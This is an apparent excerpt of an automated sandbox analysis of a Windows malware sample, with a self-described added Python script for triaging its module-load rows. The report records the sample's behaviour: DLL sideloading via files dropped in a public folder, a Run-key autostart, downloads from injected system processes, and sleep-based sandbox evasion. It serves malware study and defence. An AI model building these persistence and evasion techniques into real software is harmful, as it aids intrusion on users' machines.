                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
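The raw "Section loaded" rows above are long, repetitive, and partly unreadable, which makes them hard to triage by eye. The following script is an added example (not part of the Joe Sandbox report and not tooling from the vendor) that parses rows in exactly that shape, collapses consecutive duplicates into counted runs, and groups the modules into families a reviewer cares about: amsi.dll, the networking stack (wininet/winhttp/webio/mswsock/dnsapi), Schannel TLS, and the DPAPI/CAPI crypto providers. The family groupings and the wording of the findings are this example's own triage heuristic, and the SAMPLE rows are constructed by hand in the same format rather than copied from the report.

```python
"""Triage helper for 'Section loaded' rows of an extracted sandbox report.

The rows arrive with the process path fused to the event text and the
'Jump to behavior' hyperlink label still glued to the module name, e.g.
    Source: C:\\...\\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
"""
import re
from collections import OrderedDict
from itertools import groupby

# Row shape after extraction: lazy match up to the first '.exe', then the
# event label, then the module name with the trailing link text removed.
ROW = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*"
    r"(?P<dll>\S+?)(?:Jump to behavior)?\s*$"
)

# Module families used by this example's triage heuristic (an assumption of
# this script, not a classification the report itself provides).
FAMILIES = {
    "amsi": {"amsi.dll"},
    "network": {"wininet.dll", "winhttpcom.dll", "webio.dll", "mswsock.dll",
                "dnsapi.dll", "iphlpapi.dll", "winnsi.dll", "fwpuclnt.dll",
                "rasadhlp.dll", "ondemandconnroutehelper.dll"},
    "tls": {"schannel.dll", "ncrypt.dll", "ncryptsslp.dll", "mskeyprotect.dll",
            "ntasn1.dll", "msasn1.dll"},
    "crypto": {"dpapi.dll", "cryptsp.dll", "rsaenh.dll", "cryptbase.dll", "gpapi.dll"},
}

# Constructed sample rows in the report's shape (not the full list from the page).
_P = r"Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: "
SAMPLE = [_P + "amsi.dllJump to behavior"] * 3 + [
    _P + "winmm.dllJump to behavior",
    _P + "amsi.dllJump to behavior",
    _P + "??.dllJump to behavior",          # name lost in extraction
    _P + "schannel.dllJump to behavior",
    _P + "dpapi.dllJump to behavior",
    # A non-load row, which the parser must skip:
    r"Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior",
]


def parse_rows(lines):
    """Yield (process, module) for each row matching the 'Section loaded' shape."""
    for line in lines:
        m = ROW.search(line)
        if m:
            yield m.group("proc"), m.group("dll").lower()


def collapse_runs(pairs):
    """Run-length encode consecutive identical rows: [(proc, dll, count), ...]."""
    return [(proc, dll, sum(1 for _ in grp)) for (proc, dll), grp in groupby(pairs)]


def summarize(lines):
    """Collapse runs, total per module, and bucket modules into FAMILIES."""
    runs = collapse_runs(parse_rows(lines))
    totals = OrderedDict()
    for _, dll, n in runs:
        totals[dll] = totals.get(dll, 0) + n
    unreadable = {dll for dll in totals if "?" in dll}
    families = {name: sorted(d for d in totals if d in dlls)
                for name, dlls in FAMILIES.items()}
    return {"runs": runs, "totals": totals,
            "unreadable": unreadable, "families": families}


def findings(summary):
    """Human-readable triage lines; one per family that is actually present."""
    out = []
    n = summary["totals"].get("amsi.dll", 0)
    if n:
        out.append(f"amsi.dll: {n} load events (check whether the sample re-maps or patches it)")
    for fam in ("network", "tls", "crypto"):
        if summary["families"][fam]:
            out.append(f"{fam}: {', '.join(summary['families'][fam])}")
    if summary["unreadable"]:
        out.append(f"{len(summary['unreadable'])} module name(s) not rendered in this copy of the report")
    return out


if __name__ == "__main__":
    s = summarize(SAMPLE)
    for proc, dll, n in s["runs"]:
        print(f"{proc}  {dll}  (x{n})")
    print("\n".join(findings(s)))
```

Feed it the report rows via `summarize(open(path).read().splitlines())`; rows that are not load events (window, registry or file rows) are ignored by the regex rather than mis-parsed.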
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Windows\SysWOW64\colorcpl.exe  Window found: window name: SysTabControl32
                  Source: Window Recorder  Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exe  Window detected: Number of UI elements: 12
                  Source: XY2I8rWLkM.exeStatic file information: File size 2200064 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

Data Obfuscation

Source: Yara match - File source: 0.2.XY2I8rWLkM.exe.28a0000.3.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.XY2I8rWLkM.exe.228a9b8.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 0.2.XY2I8rWLkM.exe.228a9b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7AC0
Source: initial sample - Static PE information: section where entry point is pointing to: .
Source: netutils.dll.0.dr - Static PE information: real checksum: 0x2c00d should be: 0x1f08e
Source: XY2I8rWLkM.exe - Static PE information: real checksum: 0x0 should be: 0x224133
Source: Ocihlomc.PIF.4.dr - Static PE information: real checksum: 0x0 should be: 0x224133
Source: easinvoker.exe.0.dr - Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr - Static PE information: section name: . (11 occurrences)
Source: netutils.dll.0.dr - Static PE information: section name: /4
Source: netutils.dll.0.dr - Static PE information: section name: /19
Source: netutils.dll.0.dr - Static PE information: section name: /31
Source: netutils.dll.0.dr - Static PE information: section name: /45
Source: netutils.dll.0.dr - Static PE information: section name: /57
Source: netutils.dll.0.dr - Static PE information: section name: /70
Source: netutils.dll.0.dr - Static PE information: section name: /81
Source: netutils.dll.0.dr - Static PE information: section name: /92
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028CA2F4 push 028CA35Fh; ret 0_2_028CA357
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028A32F0 push eax; ret 0_2_028A332C
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028BD20C push ecx; mov dword ptr [esp], edx 0_2_028BD211
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028A6372 push 028A63CFh; ret 0_2_028A63C7
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028A6374 push 028A63CFh; ret 0_2_028A63C7
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B3028 push 028B3075h; ret 0_2_028B306D
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B3027 push 028B3075h; ret 0_2_028B306D
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028A673E push 028A6782h; ret 0_2_028A677A
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028A6740 push 028A6782h; ret 0_2_028A677A
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028AC528 push ecx; mov dword ptr [esp], edx 0_2_028AC52D
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028AD55C push 028AD588h; ret 0_2_028AD580
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028ACBA8 push 028ACD2Eh; ret 0_2_028ACD26
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B9B58 push 028B9B90h; ret 0_2_028B9B88
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028C9B58 push 028C9D76h; ret 0_2_028C9D6E
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B78C8 push 028B7945h; ret 0_2_028B793D
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028AC8D6 push 028ACD2Eh; ret 0_2_028ACD26
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B6902 push 028B69AFh; ret 0_2_028B69A7
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B6904 push 028B69AFh; ret 0_2_028B69A7
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B5E38 push ecx; mov dword ptr [esp], edx 0_2_028B5E3A
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028CDF18 push eax; ret 0_2_028CDFE8
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B2F1C push 028B2F92h; ret 0_2_028B2F8A
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B7CA8 push 028B7CE0h; ret 0_2_028B7CD8
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B7CA6 push 028B7CE0h; ret 0_2_028B7CD8
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_046BE54D push esi; ret 5_2_046BE556
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_046BB0F2 push esp; ret 5_2_046BB141
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_046BB142 pushad ; ret 5_2_046BB151
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_046B7106 push ecx; ret 5_2_046B7119
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_04694E56 push ecx; ret 5_2_04694E69

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\extrac32.exe - File created: C:\Users\Public\Libraries\Ocihlomc.PIF
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_04666EB0 ShellExecuteW,URLDownloadToFileW, 5_2_04666EB0
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - File created: C:\Users\Public\Libraries\easinvoker.exe
Source: C:\Windows\SysWOW64\extrac32.exe - File created: C:\Users\Public\Libraries\Ocihlomc.PIF
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - File created: C:\Users\Public\Libraries\netutils.dll
Source: C:\Windows\SysWOW64\colorcpl.exe - Code function: 5_2_0467AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 5_2_0467AA4A
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ocihlomc (2 occurrences)
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Code function: 0_2_028B9B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_028B9B94
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe - Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (90 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe - Process information set: NOOPENFILEERRORBOX (2 occurrences)
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466F7A7 Sleep,ExitProcess,5_2_0466F7A7
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63F7A7 Sleep,ExitProcess,8_2_1C63F7A7
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_0467A748
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_1C64A748
                  Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 6723
                  Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 2913
                  Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: foregroundWindowGot 1753
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
                  Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5508 Thread sleep time: -74500s >= -30000s
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4040 Thread sleep time: -20169000s >= -30000s
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4040 Thread sleep time: -8739000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exe Code function: 0_2_028A58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58CC
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04669665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669665
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04669253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_04669253
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0467C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0467C291
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0466C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0466BD37
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_046AE879 FindFirstFileExA,5_2_046AE879
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466783C FindFirstFileW,FindNextFileW,5_2_0466783C
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0466880C
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_04679AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04679AF5
                  Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 5_2_0466BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0466BB30
                  Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_1C63BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_1C63BD37
